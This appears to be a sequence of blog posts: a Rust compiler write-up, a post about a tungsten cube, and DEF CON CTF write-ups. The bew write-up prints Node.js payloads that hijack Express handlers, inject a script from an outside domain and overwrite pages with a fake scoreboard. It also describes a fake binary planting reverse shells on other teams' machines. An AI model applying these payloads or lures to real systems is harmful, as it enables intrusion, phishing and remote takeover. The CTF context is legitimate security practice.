The AST we produced made good use of Rust’s type system, including extensive use of enum sum types to handle variants of types, expressions and statements. We also used Option and Vec extensively, as well as Box to allow type recursion. Our AST types looked like this:

// We preserve source span information using a `Spanned` struct
pub type Type = Spanned<TypeKind>;

#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub enum TypeKind {
    Array(Box<Type>),
    Ref(TypeRef),
    Int,
    Byte,
    // ...
}

// ...

#[derive(Clone, Debug)]
pub struct InterfaceDecl {
    pub name: String,
    pub extends: Vec<TypeRef>,
    pub methods: Vec<Signature>,
}

We produced this using a Parser struct with functions for parsing different constructs that could also return parse errors. The Parser struct had a number of helper functions to easily consume and inspect tokens, using the power of abstraction present in a full programming language to get closer to the brevity of a parser generator grammar DSL. Here’s an example of what our parser looked like:

#[derive(Clone, Debug)]
pub enum ParseError {
    Unexpected(SpannedToken),
    DuplicateModifier(SpannedToken),
    MultipleVisibilities,
    // ...
}

pub struct Parser<'a> {
    tokens: &'a [SpannedToken],
    pos: usize,
}

// ...

fn parse_for_statement(&mut self) -> PResult<ForStatement> {
    self.eat(&Token::For)?;
    self.eat(&Token::LParen)?;
    let init = self.parse_unless_and_eat(Token::Semicolon, Self::parse_for_init)?;
    let condition = self.parse_unless_and_eat(Token::Semicolon, Self::parse_expr)?;
    let update = self.parse_unless_and_eat(Token::RParen, Self::parse_statement_expr)?;
    let body = self.parse_statement()?;
    Ok(ForStatement { init, condition, update, body })
}

// ...

Backtracking

Mostly our parser takes the form of an LL(1) parser, which looks ahead one token to decide how it should parse. But some constructs require unlimited lookahead to parse. For example (java.lang.String)a should parse as a parenthesized field access chain on the ‘java’ variable except for the a at the end, which makes it a cast expression. In fact even LR(1) parsers can’t parse this specific case properly, and the recommended hack is to parse the inside of the parens as an “expression” and then just validate in the weeder that the expression is actually a type.

We solve this problem using backtracking, which is where we can save a position in the token stream, speculatively parse the following input as one construct, and then roll back to that saved position if that parsing fails. This can cause non-linear parse times on pathological input, but pathological cases don’t occur non-maliciously in practice, especially if backtracking is only used in some situations rather than for the whole parser.

An alternative strategy to backtracking that works in some situations is to parse the common elements of both nonterminals that could follow, then once the parser reaches the point where it can decide, it calls the specific non-terminal function passing what has been parsed so far as arguments. We use this strategy for deciding between parsing classes and interfaces and between parsing methods and constructors, by parsing the modifiers first, then looking ahead, then parsing the rest passing the parsed modifiers as arguments.

We have Rust helper functions that make backtracking really easy by trying one parse and then trying another if the first parse returns an Err:

// Unlike the Java spec, we can have arguments like `allow_minus` to avoid
// massive duplication in the case of minor special cases.
// `allow_minus` makes sure `(a)-b` parses as `int-int` rather than `(Type)(-int)`
fn parse_prim_expr(&mut self, allow_minus: AllowMinus) -> PResult<Box<Expr>> {
    let cur = &self.tokens[self.pos];
    let mut lhs = match &cur.tok {
        Token::LParen => self.one_of(Self::parse_cast_expr, Self::parse_paren_expr),
        // ...
    };
    // ...
}

Pratt expression parsing

Instead of parsing expressions with precedence using many grammar levels, we use a Pratt parsing / precedence climbing system. This algorithm allows specifying the operators as a table with a “binding power” integer, with higher binding power for operators with higher precedence. This is both easier and more efficient for parsing expressions with many levels of precedence.

Instead of using data tables like in the canonical Pratt parser implementation, we used Rust functions with match statements, which fill the same purpose but with more power and no need to keep a data structure around:

fn binding_power(cur: &SpannedToken) -> Option<u8> {
    match &cur.tok {
        Token::Operator(op) => match op {
            Op::Times | Op::Divide | Op::Modulo => Some(12),
            Op::Plus | Op::Minus => Some(11),
            Op::Greater | Op::GreaterEqual | Op::Less | Op::LessEqual => Some(9),
            Op::Equal | Op::NotEqual => Some(8),
            Op::And => Some(7),
            // ...
        },
        Token::Instanceof => Some(9),
        _ => None,
    }
}

Snapshot testing

Starting when we did our parser and continuing for the rest of our compiler, we made extensive use of snapshot testing with the insta crate. Snapshot testing (similar to expect tests) allows you to write tests which just provide the resulting data structure of some process and the testing system will create a “snapshot” of the result of that test in a file, and if the result ever changes it will cause a test failure and show you the diff between the snapshot file and the result it got. If the change was expected, you can then run a command to update the snapshot files that changed.

This was super useful for writing our parser, before we could parse full files and do anything with them, we could parse short snippets into AST types implementing the Rust Debug trait, and insta would create pretty-printed snapshots that we could inspect for correctness, and then commit to check for future regressions.

#[test]
fn test_statement() {
    let mut lexer = file_lexer("testdata/statements.java");
    let tokens = lexer.lex_all().unwrap();
    let mut parser = Parser::create(&tokens);

    let statement = parser.parse_statement();
    assert_debug_snapshot_matches!("statements", statement);
}

Later during the code generation phase we used this extensively to check our assembly output on test programs.

Semantic analysis

About half of our compiler is in the middle-end passes which compute information necessary for code generation and verify various correctness properties. This includes:

Resolving variable and type names.
Folding constant expressions like 5*3+2 into numbers.
Checking many different constraints of the Java class/interface hierarchy.
Checking that all statements are reachable and all non-void functions return.
Resolving types of all expressions and checking their correctness.

Visitor infrastructure

Most of the passes in the middle of our compiler only care about certain AST nodes, but need to act on those nodes anywhere they might occur in the AST. One way to do this would be to pattern match through the whole AST in every patch, but there’s a lot of nodes so that would involve a lot of duplication.

Instead we have a Visitor trait (like an interface in other languages) which can be implemented by a compiler pass. It has callbacks only for the events we actually need, which can run code at various points in the traversal of the AST, as well as modify the AST in place. All the callbacks have default implementations that do nothing so that passes only need to implement the methods they need.

// We use a dynamic error type here so we don't have to make the visitor generic and
// instantiate it a bunch for every error type
pub type VResult = Result<(), Box<std::error::Error>>;

pub trait Visitor {
    // used for resolving variable references
    fn visit_var_ref(&mut self, _t: &mut VarRef) -> VResult {
        Ok(())
    }

    fn start_method(&mut self, _t: &mut Method) -> VResult {
        Ok(())
    }

    // `finish_` methods get passed the result of traversing their body so that they
    // can wrap errors to provide better location information
    fn finish_method(&mut self, _t: &mut Method, res: VResult) -> VResult {
        res
    }

    // like a `finish_` method except it doesn't need the result
    fn post_expr(&mut self, _t: &mut Expr) -> VResult {
        Ok(())
    }

    // ... a bunch of other methods
}

Passes that implement Visitor are driven by dynamically dispatched calls from the Visitable trait, which is implemented by every AST node and traverses the whole tree in evaluation order. A cool Rust feature we make good use of is “blanket impls” which make the logic for handling AST children that are in containers clean and uniform.

pub trait Visitable {
    fn visit(&mut self, v: &mut dyn Visitor) -> VResult;
}

impl<T: Visitable> Visitable for Vec<T> {
    fn visit(&mut self, v: &mut dyn Visitor) -> VResult {
        for t in self {
            t.visit(v)?;
        }
        Ok(())
    }
}

// ... other blanket impls for Option<T> and Box<T>

impl Visitable for TypeKind {
    fn visit(&mut self, v: &mut dyn Visitor) -> VResult {
        match self {
            TypeKind::Array(t) => t.visit(v)?,
            TypeKind::Ref(t) => t.visit(v)?,
            _ => (),
        }
        Ok(())
    }
}

impl Visitable for ForStatement {
    fn visit(&mut self, v: &mut dyn Visitor) -> VResult {
        v.start_for_statement(self)?;
        // closure allows us to use ? to combine results
        let res = (|| {
            self.init.visit(v)?;
            self.condition.visit(v)?;
            self.update.visit(v)?;
            self.body.visit(v)
        })();
        v.finish_for_statement(self, res)
    }
}

// ... many other Visitable implementations

This made a lot of our passes much easier. For example constant folding just overrides the post_expr method, checks if the children of an expression are constants and if so uses mem::replace to replace the node with a constant.

Resolving names

One discussion we had is how to handle resolving type and variable names. The most obvious way was doing so by mutating the AST using an Option field that’s initially None. However our functional programmer instincts felt icky about this so we tried to think of a better way. Using an optional field also had the problem that we knew by the code generation phase that all variables would be resolved but the type system would still think they could be None so we’d need to unwrap() them every time we wanted to access them.

We first considered using a side table where we’d give every named reference an ID or hash it, then have a map from ID to resolved location that we created during the resolution stage. But we didn’t like how this would make debugging harder since we could no longer just print out our AST types with Debug to see all their information including resolutions. It also would require passing around quite a few side tables and doing lots of lookups in them by the later stages. It didn’t even solve the need for unwrap since the table access could theoretically not find the corresponding element.

Next we considered making all of our AST types generic with an annotation type parameter that started out as () but changed as the AST progressed through stages where it gained more info. The main problem with this is that each pass would need to re-build the entire AST, which would make easy visitor infrastructure much harder. Maybe if Rust had something like an automatically derivable Functor implementation it wouldn’t have been bad, but barring that it would need a lot of boilerplate. There were also multiple things we needed to annotate at various stages necessitating many parameters, and a lot of AST types, which would require a lot of refactoring our AST and parser to add a multitude of parameters.

So instead we just bit the bullet and used Option type fields, and I think it worked out well. We implemented a nice Reference<T, R> generic that had a raw and resolved field. We used it for both variable and type references. It had Hash and PartialEq implementations that only looked at the resolved value because that’s what mattered for data structures in later passes. It also had a special Debug implementation that made the output in snapshot tests nicer:

impl<T: fmt::Debug, R: fmt::Debug> fmt::Debug for Reference<T, R> {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        if let Some(r) = &self.resolved {
            write!(f, "{:#?} => {:#?}", self.raw, r)
        } else {
            write!(f, "{:?}", self.raw) // only print the raw if not resolved yet
        }
    }
}

Reference counting

In a number of different places, especially the class hierarchy checking and type checking phases, a lot of things needed to have the same pieces of information propagated to them. For example types bubbling up an expression or inherited methods bubbling down a tree. In a language like Java we’d just have multiple references to the same object, but in Rust for ownership reasons we couldn’t do that straightforwardly. We started out in some places by cloneing things which worked fine, but I realized I could just switch everything to use Rc to allow sharing.

I had an interesting moment where I thought “man it sucks that this code has to do all this reference count manipulation, that’s unnecessarily slow, maybe I should refactor this to use an arena or something”. Then I realized that if I had been writing in Swift I wouldn’t have given this a second thought because everything would be ref-counted, and even worse than the Rust version, atomically ref-counted. Writing code in Rust makes me feel like I have an obligation to make code as fast as possible in a way other languages don’t, just by surfacing the costs better. Sometimes I need to remind myself that actually it’s fast enough already.

Code Generation

The course requires that we generate textual NASM x86 assembly files. Given that we only need to output to those, we decided we didn’t need an intermediate abstraction for generating assembly, and our code generation stage could just use Rust string formatting. This would make our code simpler, easier and also allow us to more easily include comments in the generated assembly.

The fact that we preserved source span information through our whole compiler and could generate comments came in handy because we could output comments containing the source expression/statement location for every single generated piece of code. This made it much easier to track down exactly which piece of code was causing a bug.

A somewhat annoying Rust thing we ran into is that we could find two easy ways of formatting to a string, both of which had an issue:

let mut s = String::new();
// Requires a Result return type or unwrap, even though it won't ever fail.
// Generates a bunch of garbage error handling LLVM needs to optimize out.
writeln!(s, "mov eax, {}", val)?;
// Allocates an intermediate String which it then immediately frees
s.push_str(format!("mov eax, {}", val));

My two teammates worked on the initial stages of code generation in parallel and each of them chose a different fork of this tradeoff, and by that close to the end of the course our consistency standards had relaxed, so our code generation has both.

Usercorn

Our compiler was supposed to output Linux ELF binaries and link to a runtime that made Linux syscalls. However, our entire team used macOS. Rewriting the runtime for macOS would have been somewhat annoying since syscalls aren’t always as easy and well documented on macOS as Linux. It also would have added an annoying delay to running our tests and made the harness more complex if we had to scp the binaries to a Linux server or VM.

I remembered that my internet friend had written a cool tool called usercorn that used the Unicorn CPU emulator plus some fanciness to run Linux binaries on macOS as if they were normal macOS binaries (or vice versa and a bunch of other things). It was straightforward to build a self-contained version that I could check into our repository and use in our tests to run our binaries. My teammate then got together a macOS build of ld that could link Linux ELF binaries and included it.

We could also use usercorn to output a trace of all the instructions executed and registers modified by our programs, and this came in handy quite a few times for debugging our code generation.

I ran into one problem where a test program that did a lot of allocation was 1000x slower under usercorn than on a real Linux server. Luckily I knew the author and I just sent him the offending binary and he quickly figured it was due to an inefficient implementation of the brk syscall which reasonable programs don’t use for every single memory allocation like the runtime the course provided did. He quickly figured out how to make it more efficient and pushed a fix later that evening which solved my problem. He’s pretty awesome, subscribe to his Patreon!

I then shared our pre-compiled bundle of usercorn and ld (with the bug fix for the assignment tests) with a few other teams I knew who used macOS so they could have an easier time testing as well.

Conclusion

Overall I’m proud of how our compiler turned out. It was a fun project and my teammates were excellent. I also think Rust ended up being a good choice of implementation language, especially the powerful enums and pattern matching. The main downsides of Rust were the long compile times (although apparently comparable to a group that did their compiler in C++), and the fact that sometimes we had to do somewhat more work to satisfy the borrow checker.

One of the most interesting learning experiences from the project was when afterwards I talked to some other teams and got to compare what it was like to do the same project in different languages and with different design decisions. I’ll talk about that in an upcoming post!

My Tungsten Cube

2019-03-03T00:00:00+00:00

A few months ago I bought a featureless cube of tungsten. It’s 1.5 inches across and cost $130, but I argue it was one of the best purchases I’ve made recently.

Why would I spend so much money on a cube? Well it’s really dense. Tungsten is one of the densest elements, over twice the density of steel. My cube weighs one kilogram despite being pretty small. The first time I held a friend’s tungsten cube I was blown away, it felt like some otherworldy force was pulling the cube down into my hand (spoiler: it was gravity). Whenever I show people my cube they consistently find it really cool and it’s fun to be able to so easily share a unique experience like that.

Even after the initial surprise wore off, I still find it just really satisfying to hold. Ever hold something with satisfying heft? Well it’s like the platonically purest amplified form of that satisfaction. I keep it on my desk and turn it around in my hands while I’m thinking.

The cool thing about it being a featureless hunk of extremely hard, durable metal that doesn’t really oxidize away, is that it will last for a long time. I expect I’ll continue getting value out of having this cube on my desk for at least 5 years and probably more. Given how much I fidget with the cube and enjoy owning it, I figure I definitely get more than $2/month worth of value out of it.

I struggled a lot with deciding to buy a cube. It felt wrong to spend so much money on a featureless hunk of metal. Money is for buying fancy doo-dads, or large things, or hotel nights, or any number of other things that cost about as much while delivering arguably less value. On the other hand there was something appealing to me about buying an object that was so platonically good. It was just a really dense cube that I could derive a pure and weird form of satisfaction from holding.

Anyhow, tungsten cubes, 10/10 would recommend. There’s a reason they have so many 5 star Amazon reviews. Maybe some day I’ll work up the courage to buy a $500 one that’s over 10 pounds like my housemate last term did.

Edit 2021-08-26: Since this is ended up on HN today, I’ll mention that in September of 2019 I bought a 3kg tungsten sphere to add to my collection. It has beautiful turning marks that give it nice anisotropic reflections, which the rendering nerd in me appreciates. It’s also really nice to roll around in my hand, and is 3x heavier than my cube. It sits on a very nice walnut stand a coworker made for me on his lathe and CNC router. I still keep the cube on my desk at work though since it’s a better size and shape for casually fidgeting with.

I got it from a custom tungsten products supplier on Alibaba as a one-off in a custom size, since it was almost half the price of a similar sphere on Amazon, although it did take a while to arrive.

Here’s a photo of it on my Lichtenberg figure coffee table, which I got on Etsy from a seller who unfortunately doesn’t make them anymore, because they’re amazing:

DEF CON 26 CTF Writeups: reverse, doublethink, bew, reeducation

2018-08-16T00:00:00+00:00

Recently I flew to Vegas to attend the DEF CON 26 CTF with (Samurai), the team I played with when we won the qualifiers. I had a lot of fun and got very little sleep, working two consecutive 20 hour days and finishing off with another 4 hours of contest at the end.

As a programmer entering CTF with only a little bit of reverse engineering experience and no exploit development skills, I was happy that the organizers included new King of the Hill format challenges this year, which I found I could contribute nicely to since they tended to mix in more programming with the hacking. I also made sure to spend some time poking around other challenge binaries in Binary Ninja to hone my reverse engineering skills, although I only managed to make a meaningful contribution doing this with reeducation.

reverse

The first challenge released and the first I worked on was reverse. It was a service with a client binary and a remote server that presented a curses interface for completing disassembly and assembly puzzles like filling in the line of assembly that matched some bytes of machine code. There were multiple “level”s consisting of a bunch of puzzles, solving them got you points and let you move to the next level, and each level was a new type of puzzle.

While a few of us in the hotel suite got started on figuring out how we wanted to automate it, people on the floor started solving puzzles manually, then aegis gradually built up a UI automation script that copied data from his terminal, parsed it, ran it through command line (dis)assembler tools and typed the answers.

Back in the hotel, a couple of us started on parsing the client output out of the VT100 but a teammate figured out the network protocol the client used so we started using that directly. The first level could actually be solved using an info leak that was present in the protocol but didn’t show up in the client, but this didn’t work for level 2 and up.

We then integrated the solvers for levels 1-4 from aegis’s automation into our script so aegis could stop having his computer taken over by UI automation every round.

We ran into a problem though, we couldn’t get through level 5 since the problems seemed nonsensical and impossible. There just wasn’t enough information in the question to choose the right answer. We realized that there must be some way to cheat to solve it.

Luckily someone else on our team had been reversing the client and fuzzing the network protocol and had discovered a number of helpful tricks like the ability to not spend the limited “coins” we had to attempt challenges, and to restart a level as much as we wanted. After aegis noted that he saw duplicate assembly lines in his logs and that we should try dumping, I started on a script. I modified our solver Python code to use the protocol tricks to quickly request level 1 problems in a pipelined way to not have to wait for round trips and dump them to a file. Then aegis tuned up the script and ran it on the CTF floor dumping thousands of lines of assembly per second, eventually converging around 280k unique lines.

I then started on using these dumps to write better versions of our solvers (which previously often failed to determine the correct answer) by cheating with the known lines. This allowed us to resolve the difference between say call sub_1432 and call sub_2532 without knowing where the procedures were and made our solving simpler and more robust. We also incorporated an underflow bug a teammate discovered from poking at the server that gave us an extra 255 points per question. Unfortunately the dump didn’t give us any clues as to how to solve level 5, and unfortunately the dumped binary didn’t appear to be the server like we’d hoped. At this point the challenge was close to closing so we gave up and started on other problems.

After the contest we learned from the organizers there was a broken protocol instruction discoverable by fuzzing that allowed you to leak the server binary. You could then find an exploit allowing you to give yourself arbitrarily many points.

doublethink

This was another King of the Hill challenge, released just before the contest shut down on the first day, it was a fun problem that motivated me to stay up nearly all night.

The gist of the challenge was that you submitted a single 4KB chunk of binary that you could then execute against a number of different architectures using various emulators, the more architectures you got to print the flag the higher your score. So the goal was to write a polyglot piece of shellcode that opened a flag file and wrote it out on modern architectures, or printed it from a known memory address on older architectures.

We realized we needed to write flag-printing shellcode for a bunch of architectures separately and then put them together in one blob with a sequence of jump instructions at the front for each architecture jumping to that architecture’s payload, and where all the other architecture’s jumps before it didn’t stop the emulator or jump somewhere unintended. Another interesting twist is that a lot of the old architectures bytes/words with varying numbers of bits, which were just chopped off the file you gave by concatenating all the bytes in binary and chunking.

We decided to start by developing a bunch of payloads in parallel that we would assemble later. I started with PDP-8, where after reading the instruction reference I found a Hello World program and a matching assembler. The first challenge was that the output format of the assembler didn’t match the format the challenge wanted, so I had to write a 50 line python script to parse the assembled output and put it together at the bit level (because of the 12 bit bytes). After that I checked it printed Hello World against the provided testing Docker image, then modified the program to print the flag, and made it much shorter.

I followed a similar process to construct a payload for PDP-10. After a bunch of architecture research and miscellaneous searching I found an assembler as part of someone’s FORTH project. I translated a Hello World program I found into that assembler’s syntax and modified the assembler code to print the info I needed, and again wrote a Python script to parse the output and munge the bits into the format we needed, then again modified the program to print the flag.

By this point other members of my team had written payloads for clemency, mix, amd64 and riscv which we considered sufficient to start pulling them together. I started by writing a script to print a file as the bytes of varying bit widths including values in octal (which PDP system ISAs matched well with) so we could debug the jump train. Then I wrote a script to assemble jump sequences and payloads for different architectures at bit-level offsets. Then aegis and I worked together for a while and found a sequence of jumps, nops and padding that worked for amd64, pdp-8 and pdp-10 together. After I went to bed a teammate managed to patch in a very short mix shellcode into ours, leaving us with a 4-polyglot for the start the next day.

The next day I spent a bunch of hours with aegis trying to get a working sequence including riscv and failing, and improving tooling and commenting it so others could try integrating more jumps. We mostly failed because things had too many constraints to fit in our head so by the time we thought we were approaching a solution we forgot an earlier constraint and went down a dead end. Eventually a teammate wrote a pdp-1 payload and that ISA had few constraints and slotted pretty easily into our existing jump train, getting us to a 5-polyglot. I then tried and failed to integrate hexagon and ibm-1401. By that time the challenge was close to ending and we decided to move on, with clemency, hexagon, ibm-1401, and riscv payloads unused, which was sad.

It later turned out that this challenge too was possible to exploit to get an artificially high score, according to the organizers and our later investigation. It was possible to use the amd64 shellcode which was run directly (as nobody) concurrently from multiple submissions to fake a correct flag printing. This allowed two teams to get “fake” scores of 9 and 11, although PPP (the 2nd place team) did actually create an 8-polyglot.

bew

Released just before the end of the second day, this was the next challenge I worked on. It was a web app with a text field you could submit to to add text to a file that was printed on another page.

While the contest servers were still up, we looked into the source and realized that the express-validator dependency had been replaced by an entirely different library using a WebAssembly module compiled with Emscripten. All inputs to the text file were passed through the validator library before being added to the text file.

After some theorizing about possible exploits involving using the Emscripten standard library emulation to use the Node fs module to get the flag, we noticed on the submissions page that people were submitting exploits involving plain JS code and it seemed to work. We were confused but aegis started putting together our own flag retrieval payload that could get past the pre-filters while other members of our team started scraping flags other teams had retrieved with a script.

Eventually we found that the way the service worked was dumber than we thought. The WebAssembly did some preliminary filtering looking for use of require or the fs module, then it passed the input to an external handler (below) which just took the input and eval‘d it in the Node server process, and put the input in the text file if it threw an exception. This looked initially like it was rejecting JS and accepting text because most text triggers JS errors. The basic exploits people were using just obscured the require and fs use and used that to get the flag and put it in a public place, which we were also scraping without even deploying our own exploit!

// The handler that the WebAssembly called into
var ASM_CONSTS = [function($0) { str = Pointer_stringify($0); try { eval(str); return 1;} catch(err) { return 0; } console.log(eval('const fs = require("fs");fs.writeFile("/tmp/test.txt", "testwrites")') + 'WEBASS got ' + $0); }];

After the contest servers closed for the night, we did some thinking about the challenge. Based on the large number of bytes you were allowed to patch only in the WebAssembly file, it seemed the intended patching solution was to write an actual JS validator, compile it to WASM and patch it in, with functional tests likely verifying that the web app still accepted text and rejected JS. This sounded like a lot of work, so we thought we’d poke around with our full remote code execution some more.

I realized that I could patch the server dynamically by just reassigning the ASM_CONSTS variable (in scope!) to not eval the string and either reject or accept all submissions, fully closing the eval hole. This would persist until the server was restarted, and based on the persistent text file we knew that the server was kept alive between requests. I eventually refined this into a version that left a back door so that we could still exploit the server if we messed up, and also made sure our exploits (containing / and _) couldn’t accidentally end up in the public text file:

ASM_CONSTS[0] = function(ptr) { str = Pointer_stringify(ptr); if(str.includes("DAT_BEST_BACK_DOOR_SECRET")) eval(str); return (str.includes("_") || str.includes("/")) ? 1 : 0; }

Meanwhile aegis figured out that he could modify the express web server handler chain to do all sorts of fun things. First he figured out how to take down all the pages, then how to add a backdoor flag page by mounting root as a public directory, then how to change responses to ones of our choosing.

I talked this with aegis and we realized this was so absurdly easy and powerful that the organizers couldn’t have thought of it. We realized we could insert a backdoor that let us get the flag and then close the door to all the other teams, with the only weakness being if another team realized this and closed the door first. If no other teams figured this out and beat us then we would get all the flags and no other team would get any, we could also close our own door without inserting the backdoor.

We took this plan to the evening team meeting and then bool (team founder Steve Vittitoe) came up with an amazing idea: Not only do we backdoor and close the door, but we add a script to all the pages that turns the page into a fake scoreboard on blur with a fake new challenge that gives us a reverse shell on their machine! After a moment of silence as we were struck by the brilliance of his idea, we enthusiastically started brainstorming our plan.

We realized that if we were lucky and were the only team to figure this out, we needed to not leak our exploit publicly so other teams could immediately figure it out themselves. So I started by developing a thrower script for our exploits that could be run automatically and would ensure a team was backdoored and the door was closed without leaking our exploit in case of a patched team that accepted all submissions:

Check our flag backdoor, if it’s there we’re done.
Submit a canary piece of bogus JS code that used all the syntactic constructs our exploits used, if it went through then submitting our exploits would leak them, so abandon.
Install the backdoor express chain rewriting code.
Check that we can retrieve the flag, if not bail and log an error.
Close the door and check that the door was successfully closed and log if not.

Next I worked on improving aegis’s payload to place the flag backdoor at a less obvious place than /flag which required some URL rewriting and also crafting an Express chain rewriting payload based on his research that could insert a script tag into all pages without modifying the rest of the page. This is the payload I ended up with:

// Part 1: exposes the flag at /flagaaa
s = process.mainModule.children[0].children[1].exports.static('/');
process.mainModule.children[0].exports._router.stack[5].handle = function(req, res, next) {
  if(req.url && req.url.includes('flag')) {
    req.url = req.url.substring(0, req.url.length-3);
  }
  return s(req, res, next);
};
// Part 2: replaces </body> with our script tag on every response
process.mainModule.children[0].exports._router.stack[3].handle = function(req, res, next) {
    var oldSend = res.send;

    res.send = function(data){
        data = data.replace(/(<\/body>)/, "<script src='https://our-xss-domain.redacted/ourpayload.js'></script></body>");
        oldSend.apply(res, [data]);
    }
    next();
};

Then I worked on the actual XSS payload which used a giant inline JS backtick string with our fake scoreboard HTML and a short snippet which overwrote the whole page with our fake one, including a favicon, and also fixed the URL to be just the IP address, knowing nobody would notice the difference between the scoreboard IP address and the challenge IP address:

window.onblur = function() {
    window.history.pushState('scoreboard', 'DC26 CTF', '/');
    document.open();
    document.write(newpage2);
    document.close();
};

While I had been doing all this, bool had whipped up a domain and server to host the XSS and fake challenge payloads, as well as completely replicating the official scoreboard’s appearance but with an extra challenge. He also added a red notice about the new challenge, which hadn’t happened for any of the real challenges, but we figured it made it more likely people would fall into it rather than less. He also set up a server to receive and manage any reverse shell connections we got.

Meanwhile aegis worked on a fake challenge binary that would spin off a reverse shell that would persist even if the challenge binary was killed. For fun he also created a bunch of fake reversing steps that made it seem like an actual challenge binary and made it difficult to notice it was a reverse shell.

By this point it was 4am and we were tired after our 2nd consecutive 20 hour day so we went to sleep. We woke up just before the contest opened again, and I got ready to throw our door closer at our own server manually since we had only automated the throwing at other teams.

But our worst fears came true and total victory was snatched from our grasp by a faster team! I threw the door closer at our own server shortly after opening and found that our canary went through when it shouldn’t. I checked with some other test payloads and sure enough, it seemed that some other team had closed our door on us, presumably after backdooring our server and all the others for themselves. It also turns out the exploit payload had errored in our automated thrower at minute 0 so we hadn’t slipped in to any teams first.

Shortly later the contest organizers realized or were informed of their oversight about persistent exploits and they put in a workaround of restarting the servers every couple minutes to give all teams a chance to slip in. After streamlining my thrower to not be cautious and be faster since clearly lots of other teams knew about the problem and were already leaking their exploits, we managed to regularly slip into a few teams servers each restart.

Soon bool started to see hits on his XSS server. We were pretty happy it was finally working. One team even downloaded our fake challenge binary, but unfortunately they don’t seem to have run it.

It wasn’t the glorious victory of monopolizing the flags and owning dozens of machines that we’d dreamed of, but we still got some people and were really proud of our clever plan and exploits. We were really happy when after the contest we talked to one of the organizers and they said they loved our idea and that actually multiple teams had come up to them and asked why the new challenge on the website wasn’t up on the projector screens! The organizer didn’t even realize it was a trick originally and went and asked another organizer if they had released a new challenge accidentally!

reeducation

In the last two hours of the contest, I took a look at the new reeducation challenge. This was an attack/defend binary challenge that appeared to have been written in Rust.

My teammates had already run a Rust demangler on the symbols and had identified some interesting functions including one including interpret and determined that we could submit a payload to the service and it would run it through the interpreter.

While they worked on reverse engineering the stages leading to the interpreter I looked at the interpreter in Binary Ninja and used gdb to test the binary and figure out which registers contained the payload and length. I figured out that each “instruction” was two 64 bit words where if the instruction was (a,b) it seemed to execute mem[a] -= mem[b] on the same memory array containing the code (allowing self modification).

I also discovered with gdb that the flag was placed in memory immediately after the submitted code. I also learned from gdb that the length register contained 1024 which was the length of the payload in bytes, but in Binary Ninja I saw the bounds checking code was treating that length as the length in 64 bit words. This allowed the payload to access 8 times the memory it should have been able to without triggering an out of bounds error, including the flag! This looked to be the intended vulnerability, I’m guessing caused by incorrect use of Rust’s unsafe Vec::from_raw_parts or slice::from_raw_parts_mut passing in the byte length instead of the u64 length, an example of how if you use unsafe functions wrong in Rust, it can lead to vulnerabilities!

At this point I went and found some teammates in the hotel also working on the problem and shared all the knowledge I hadn’t already posted on Slack. They had figured out that the payload we submitted had to contain only bytes of below a certain value. We figured out we had all the knowledge we needed to write an exploit, but we only had 40 minutes of contest left, which was likely not enough.

My teammates started on an exploit script and I helped out occasionally, figuring out that we could use self-modifying code to access offsets that wouldn’t otherwise make it through the byte value filter. Unfortunately we didn’t have enough time to get a working exploit together.

However, while they were working on that I worked on developing a patch. In Binary Ninja I figured out that just underneath the code that initially retrieved the length there was a right shift that divided by 8 for use by some other part of the code. I used Binary Ninja’s patching functionality to fix that code to replace the mov, shr with a shr, mov sequence of the same length that shifted the main length register and then copied it into the other register. The idea was this would fix the length to be the correct length to not allow out of bounds indexing to reach the flag. I posted my 7 byte patch in the Slack channel and one of the people on the floor submitted a patched binary using their better networking 15 minutes before the end of the contest. Unfortunately, the scoreboard was hidden for the final day of the contest so although my patch passed the tests, I don’t know if it actually succeeded in getting us a few extra defense points in the final couple ticks.

Conclusion

I had a ton of fun, and my team (Samurai) ended up coming 11th, which although it isn’t as good as our first place finish in the qualifiers, is pretty good considering how high level the competition at the event was. I think the real victory though was our awesome fake challenge XSS exploit for bew, that was really fun to pull off. I also learned a bunch more about competing in CTFs from my awesome teammates!

Winning the DEF CON Quals CTF! Writeups: Easy Pisy, Flagsifier, Geckome

2018-05-13T00:00:00+00:00

A friend invited me to join his CTF team (Samurai) this year for the Plaid CTF and the DEF CON qualifiers and I thought that sounded fun and wanted to learn more security and reverse engineering, so I did. For Plaid I just spent a couple hours tinkering with a few problems with my main accomplishment being reverse engineering a complicated APL program. For DEF CON I decided to go all out and dedicate my entire weekend to it. I had a really great time, and we won!

I solved three problems mostly by myself: Easy Pisy, Flagsifier and Geckome. The last two were the 6th and 1st least-solved challenges in the game, and the less people solved a challenge the more points it was worth. This corresponds a little to how much work was required, but also to how many lucky/clever/random insights are required, and how much effort other teams decided to put in. I’d say Flagsifier was genuinely tricky but Geckome, the least-solved challenge, was mostly luck and good tactics and wasn’t much work compared to many other challenges.

I spent the last 4 hours of the CTF working on a solution to “adamtune”, and I finished a whole bunch of work that did what I intended, it just turned out the results weren’t very good. The way the problem worked it was impossible to tell ahead of time whether my approach would be good enough, so I just had to spend the time and it didn’t pan out. Now that the source has been posted, it seems like my basic approach was correct, and that if I had used the Watson speech to text API instead of the Google one it may have given me the extra info I needed to make a good solution.

I also contributed a bit to discussion and reverse engineering on a few other problems, including “It’s-a me!”, “Tech Support” and “exzendtential-crisis”.

Without further ado, here’s my writeups for the problems that I solved:

Easy Pisy

A web app gave us the ability to sign a PDF and then submit a signed PDF. There was accessible source for the PHP scripts and sample PDFS. The source and examples showed that the PDF’s could contain two possible commands: ECHO and EXECUTE (which runs a shell command). The signing script would only sign ECHO PDFs so you couldn’t trivially execute any command.

Running one of the sample PDFs through showed the commands being run included converting the PDF to a PPM file and then running ocrad (an OCR tool) to extract the text out of them.

One of the example PDFs ran EXECUTE ls and came with a signature, it showed there was a flag file in the working directory.

So the problem was how to get a signed PDF that shows the text EXECUTE cat flag, when we could only sign a PDF that had an ECHO command. This sounded a lot like it could involve the recent-ish PDF SHA1 collision. A quick check of the PHP docs showed that the openssl_verify function they used defaults to using SHA1 signatures!

My teammate fstenv found the https://alf.nu/SHA1 website for generating colliding PDFs, and I quickly opened Pixelmator and drew up one JPEG that said ECHO hi in big Arial font and another that said EXECUTE cat flag. I ran it through the service and it spit out two PDFs with identical hashes. I then went through signing the echo one and executing the cat one and got the flag!

It’s-a Me

This challenge involved a binary that presented text-based menus for a pizza restaurant. A bunch of us opened up the binary in Binary Ninja and IDA and used revsync to collaborate on naming symbols.

